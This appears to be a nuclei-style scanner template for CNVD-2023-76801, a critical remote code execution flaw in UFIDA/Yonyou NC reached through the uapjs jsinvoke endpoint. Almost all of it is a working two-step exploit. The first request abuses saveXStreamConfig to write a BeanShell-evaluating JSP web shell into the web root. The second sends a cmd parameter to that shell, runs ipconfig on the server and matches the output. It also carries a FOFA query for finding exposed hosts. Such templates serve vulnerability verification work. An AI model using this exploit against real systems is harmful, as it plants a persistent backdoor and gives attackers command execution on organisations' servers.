## id: CNVD-2023-76801
## name: UFIDA NC uapjs - Remote Code Execution
## author: hack007x
## severity: critical
## tags: cnvd,cnvd2023,yonyou,rce,intrusive,vuln
## description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
## reference: https://mp.weixin.qq.com/s/8ZRrmUCD2bfznd1MyDDU8A
## fofa-query: app="用友-NC-Cloud"
## verification: true

#$ filename = {{random_str(12)}}
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-type: application/x-www-form-urlencoded

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/{{filename}}.jsp"]}

#@ condition: and
#@ matcher: content_length == 0
#@ matcher: status_code == 200

---

POST /{{filename}}.jsp?error=bsh.Interpreter HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-type: application/x-www-form-urlencoded

cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ipconfig").getInputStream())

#@ condition: and
#@ matcher: body contains "Windows" && body contains "<?xml" && body contains "DNS"
#@ matcher: status_code == 200 || status_code == 404





# @VEIL-STAMP: 66c3bf7ca9ad3bab5a18cc70a78f144f350129ee1d91471121a10b452affa5d5
